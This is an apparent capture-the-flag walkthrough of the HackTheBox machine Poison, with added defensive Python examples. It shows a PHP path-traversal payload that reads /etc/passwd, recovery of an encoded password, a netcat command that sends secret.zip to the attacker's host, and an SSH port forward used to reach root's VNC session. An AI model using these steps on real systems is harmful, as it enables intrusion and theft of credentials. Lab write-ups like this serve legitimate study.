HackTheBox - Poison Writeup

Source: https://www.absolomb.com/2018-09-08-HackTheBox-Poison/

Poison is a fairly easy HackTheBox machine, but it does contain a few interesting and unusual elements.

Initial foothold

Network enumeration

As usual, let's start with a quick nmap scan.

root@kali:~# nmap -sV 10.10.10.84

Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-24 12:27 CDT
Nmap scan report for 10.10.10.84
Host is up (0.052s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Let's look at the page on port 80 in a browser.

We can check each of these filenames in the Scriptname field. When we submit listfiles.php, the page outputs the following:

Note the form of the URL: the way these files are loaded may be vulnerable to LFI (local file inclusion).

Let's look at pwdbackup.txt first, since that file looks interesting.

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=pwdbackup.txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

Encoded 13 times. Fine, rather than decoding it by hand over and over, let's write a quick Python script to do it.

import base64

# The base64 blob from pwdbackup.txt, line-wrapped exactly as served.
# b64decode() discards the embedded newlines before decoding.
string = """
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo= """

def decode(b64_string, iterations):
    # Peel one base64 layer per iteration; each layer decodes to text, so we
    # turn the bytes back into a str before feeding it to the next round.
    i = 0
    while i < iterations:
        b64_string = base64.b64decode(b64_string).decode('utf-8')
        i += 1
    print(b64_string)

decode(string, 13)

Run the script:

root@kali:~/htb/poison# python3 decode.py
Charix!2#4%6&8(0
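The script above hardcodes 13 iterations because the file told us the count. As an added example (not part of the original writeup), here is a version that keeps peeling layers until the data stops looking like base64, so it works when the depth is unknown. It assumes each layer is text (as here); if a layer decodes to non-UTF-8 bytes it stops and reports what it has. The sample input is constructed in the block itself by nesting a known string, so the result can be checked without knowing the box's password.

```python
import base64
import binascii


def _compact(text: str) -> str:
    """Drop the line wrapping and trailing newlines that base64 tools add."""
    return "".join(text.split())


def looks_like_base64(text: str) -> bool:
    """Strict check: base64 alphabet only, length a multiple of 4, valid padding."""
    compact = _compact(text)
    if not compact or len(compact) % 4:
        return False
    try:
        base64.b64decode(compact, validate=True)
    except binascii.Error:
        return False
    return True


def peel_base64(blob: str, max_layers: int = 64):
    """Decode base64 repeatedly until the result no longer looks like base64.

    Returns (final_text, layers_removed). Stops early if a layer decodes to
    bytes that are not UTF-8 text, which means we reached binary data rather
    than another base64 layer. max_layers bounds the loop for pathological input.
    """
    current = blob
    layers = 0
    while layers < max_layers and looks_like_base64(current):
        raw = base64.b64decode(_compact(current), validate=True)
        try:
            current = raw.decode("utf-8")
        except UnicodeDecodeError:
            break
        layers += 1
    return current, layers


def nest_encode(text: str, layers: int) -> str:
    """Demo helper: wrap text in `layers` rounds of base64 (constructed input)."""
    data = text.encode("utf-8")
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode("ascii")


if __name__ == "__main__":
    # Constructed sample: the '-' keeps the plaintext outside the base64
    # alphabet, so the loop stops exactly when the real text appears.
    sample = nest_encode("constructed-sample", 13)
    # Wrap at 76 columns, the way the file on the box is wrapped.
    wrapped = "\n".join(sample[i:i + 76] for i in range(0, len(sample), 76))
    print(peel_base64(wrapped))  # ('constructed-sample', 13)
```

The stopping rule is a heuristic: a plaintext that happens to consist only of base64 characters with a length divisible by four would be decoded one layer too far, which is why the final text is worth eyeballing (here the `!`, `#` and `%` in the password make that impossible).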

OK! We have the password, but we still need a username. Let's test whether the LFI vulnerability is real.

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../etc/passwd

<br />
<b>Warning</b>:  include(../../../etc/passwd): failed to open stream: No such file or directory in <b>/usr/local/www/apache24/data/browse.php</b> on line <b>2</b><br />
<br />
<b>Warning</b>:  include(): Failed opening '../../../etc/passwd' for inclusion (include_path='.:/usr/local/www/apache24/data') in <b>/usr/local/www/apache24/data/browse.php</b> on line <b>2</b><br />

Here we can see that include() really is used, and the warning also leaks the include path, so we need to go up five directory levels to reach the filesystem root.
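To make the "five levels" arithmetic concrete, and to show the check browse.php is missing, here is an added example (not code from the original writeup or from the box). It resolves a `file=` value against the include path leaked in the warning above, reports where include() would actually land, and runs the same containment test over a few constructed Apache access-log lines to flag traversal attempts, including double-URL-encoded ones. The log lines are hypothetical samples written for this example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Document root, taken from the include_path shown in the PHP warning above.
INCLUDE_BASE = "/usr/local/www/apache24/data"

# Start of an Apache common/combined log line: client IP and request target.
_REQUEST_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')


def resolve_include(base: str, requested: str) -> str:
    """Absolute path that include() ends up opening for a relative (or absolute) target."""
    return posixpath.normpath(posixpath.join(base, requested))


def is_within_base(base: str, requested: str) -> bool:
    """The containment check browse.php lacks: True only if the target stays under base."""
    base = posixpath.normpath(base)
    resolved = resolve_include(base, requested)
    return resolved == base or resolved.startswith(base + "/")


def flag_traversal(log_lines):
    """Return (client_ip, decoded file value) for each request whose file= escapes the base."""
    hits = []
    for line in log_lines:
        m = _REQUEST_LINE.match(line)
        if not m:
            continue
        client_ip, target = m.groups()
        # parse_qs already applies one round of percent-decoding; a second
        # unquote catches double-encoded dots and slashes (%252e%252e%252f).
        for value in parse_qs(urlsplit(target).query).get("file", []):
            value = unquote(value)
            if not is_within_base(INCLUDE_BASE, value):
                hits.append((client_ip, value))
    return hits


# Constructed access-log lines (hypothetical) mirroring the requests made above.
SAMPLE_LOG = [
    '10.10.14.8 - - [24/Apr/2018:12:30:01 -0500] "GET /browse.php?file=pwdbackup.txt HTTP/1.1" 200 1234',
    '10.10.14.8 - - [24/Apr/2018:12:31:12 -0500] "GET /browse.php?file=../../../etc/passwd HTTP/1.1" 200 512',
    '10.10.14.8 - - [24/Apr/2018:12:31:40 -0500] "GET /browse.php?file=../../../../../etc/passwd HTTP/1.1" 200 2048',
    '10.10.14.8 - - [24/Apr/2018:12:32:05 -0500] "GET /browse.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2048',
    '10.10.14.9 - - [24/Apr/2018:12:33:00 -0500] "GET /index.php HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for n in (3, 5, 7):
        print(n, "levels ->", resolve_include(INCLUDE_BASE, "../" * n + "etc/passwd"))
    for client_ip, value in flag_traversal(SAMPLE_LOG):
        print("traversal attempt from", client_ip, "->", value)
```

Three `../` from the document root only reach /usr/local, which is exactly why the first attempt produced "No such file or directory"; five reach /, and extra levels beyond that are harmless because normpath cannot climb above the root. Note that the failed three-level request is still flagged: the detection keys on intent (a path that escapes the document root), not on whether the file existed.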

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../../../etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr$
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh

We see a user named charix. Let's try SSH with that username and the password we recovered.

root@kali:~/htb/poison# ssh charix@10.10.10.84
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier
Edit /etc/motd to change this login announcement.
You can often get answers to your questions about FreeBSD by searching in the
FreeBSD mailing list archives at
        http://www.FreeBSD.org/search/search.html
charix@Poison:~ %

Excellent!

Privilege escalation

Looking at the home directory, we see a suspicious zip file.

charix@Poison:~ % ls -al
total 48
drwxr-x---  2 charix  charix   512 Mar 19 17:16 .
drwxr-xr-x  3 root    wheel    512 Mar 19 16:08 ..
-rw-r-----  1 charix  charix  1041 Mar 19 17:16 .cshrc
-rw-rw----  1 charix  charix     0 Mar 19 17:17 .history
-rw-r-----  1 charix  charix   254 Mar 19 16:08 .login
-rw-r-----  1 charix  charix   163 Mar 19 16:08 .login_conf
-rw-r-----  1 charix  charix   379 Mar 19 16:08 .mail_aliases
-rw-r-----  1 charix  charix   336 Mar 19 16:08 .mailrc
-rw-r-----  1 charix  charix   802 Mar 19 16:08 .profile
-rw-r-----  1 charix  charix   281 Mar 19 16:08 .rhosts
-rw-r-----  1 charix  charix   849 Mar 19 16:08 .shrc
-rw-r-----  1 root    charix   166 Mar 19 16:35 secret.zip
-rw-r-----  1 root    charix    33 Mar 19 16:11 user.txt

Let's transfer the zip file to our local machine with netcat.

charix@Poison:~ % nc -w 2 10.10.14.8 443 < secret.zip
root@kali:~/htb/poison# nc -lvnp 443 > secret.zip
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.84] 13787

The zip file is password protected, but we can try the charix user's SSH password to extract it. And it works!

root@kali:~/htb/poison# unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password:
 extracting: secret

Checking the file type, we see that it is supposedly an ordinary ASCII text file.

root@kali:~/htb/poison# file secret
secret: Non-ISO extended-ASCII text, with no line terminators
root@kali:~/htb/poison# cat secret
[|Ֆz!

However, the contents are garbage characters. Let's get to know this server a bit better. Checking the running processes with ps aux, we see the following interesting entries.

root    529   0.0  0.9  23620  8996 v0- I    19:17     0:00.22 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geo
root    540   0.0  0.7  67220  7060 v0- I    19:17     0:00.07 xterm -geometry 80x24+10+10 -ls -title X Desktop

We also see some ports listening on localhost only.

charix@Poison:~ % netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0      0 10.10.10.84.22         10.10.14.8.44976       ESTABLISHED
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN
udp4       0      0 *.514                  *.*
udp6       0      0 *.514                  *.*

Ports 5801 and 5901 are typically used by VNC, which matches the running VNC session we saw in the process list. Let's forward the port back to our local machine so we can reach it (make sure SSH is running on your local machine!).
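Reading FreeBSD netstat output by eye works on a box with a dozen sockets, but the mapping from port to VNC display is the part people get wrong. The following added example (not from the original writeup) parses the `netstat -an` output shown above, lists the ports bound only to loopback, and maps VNC ports to their X display number (5900+N is the RFB port, 5800+N the Java/HTTP viewer port). The sample text is copied from the output above and embedded inline.

```python
LOOPBACK = {"127.0.0.1", "::1"}

# The netstat -an output from the box, embedded so the example runs offline.
NETSTAT_SAMPLE = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0      0 10.10.10.84.22         10.10.14.8.44976       ESTABLISHED
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN
udp4       0      0 *.514                  *.*
udp6       0      0 *.514                  *.*
"""


def parse_freebsd_listeners(text):
    """Return (proto, host, port) for every listening socket in FreeBSD netstat -an output.

    FreeBSD writes the local address as host.port, so the port is the part
    after the last dot; '*' means a wildcard bind. TCP sockets count only in
    LISTEN state; UDP sockets have no state column and are always bound.
    """
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or not parts[0].startswith(("tcp", "udp")):
            continue
        proto, local = parts[0], parts[3]
        state = parts[5] if len(parts) > 5 else ""
        if proto.startswith("tcp") and state != "LISTEN":
            continue
        host, port = local.rsplit(".", 1)
        listeners.append((proto, host, int(port)))
    return listeners


def loopback_only(listeners):
    """Ports reachable only via loopback (no wildcard or external bind on the same port)."""
    exposed = {port for _, host, port in listeners if host not in LOOPBACK}
    local = {port for _, host, port in listeners if host in LOOPBACK}
    return sorted(local - exposed)


def vnc_display(port):
    """Map a VNC port to (service, display): 5900+N is RFB, 5800+N is the HTTP viewer."""
    if 5900 <= port < 6000:
        return ("rfb", port - 5900)
    if 5800 <= port < 5900:
        return ("http", port - 5800)
    return None


def summarize(text):
    """(port, vnc mapping or None) for each loopback-only listener in the output."""
    listeners = parse_freebsd_listeners(text)
    return [(port, vnc_display(port)) for port in loopback_only(listeners)]


if __name__ == "__main__":
    for port, vnc in summarize(NETSTAT_SAMPLE):
        print(port, vnc if vnc else "not a VNC port")
```

The two loopback-only VNC ports both map to display :1, which lines up with the `Xvnc :1` process owned by root in the ps output. A listener bound to 127.0.0.1 is not protected from a local account, so a root VNC session on loopback deserves the same credential hygiene as an exposed one.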

charix@Poison:~ % ssh -l root -R 5801:127.0.0.1:5901 10.10.14.8
root@10.10.14.8's password:
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@kali:~#

If we check the listening connections on Kali, we see that the port forward succeeded.

root@kali:~# netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:5801          0.0.0.0:*               LISTEN
tcp        0      0 10.10.14.8:44976        10.10.10.84:22          ESTABLISHED
tcp        0      0 10.10.14.8:22           10.10.10.84:54672       ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 ::1:5801                :::*                    LISTEN

vncviewer supports a -passwd option that takes a password file for authentication, so let's try passing it the secret file we extracted earlier.

root@kali:~/htb/poison# vncviewer -h
TightVNC Viewer version 1.3.9
Usage: vncviewer [<OPTIONS>] [<HOST>][:<DISPLAY#>]
       vncviewer [<OPTIONS>] [<HOST>][::<PORT#>]
       vncviewer [<OPTIONS>] -listen [<DISPLAY#>]
       vncviewer -help
<OPTIONS> are standard Xt options, or:
        -via <GATEWAY>
        -shared (set by default)
        -noshared
        -viewonly
        -fullscreen
        -noraiseonbeep
        -passwd <PASSWD-FILENAME> (standard VNC authentication)

root@kali:~/htb/poison# vncviewer -passwd secret 127.0.0.1:5801
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"

That's it, done!

This article is shared from the WeChat public account 安恒网络空间安全讲武堂 (cyberslab).

Originally published: 2018-11-22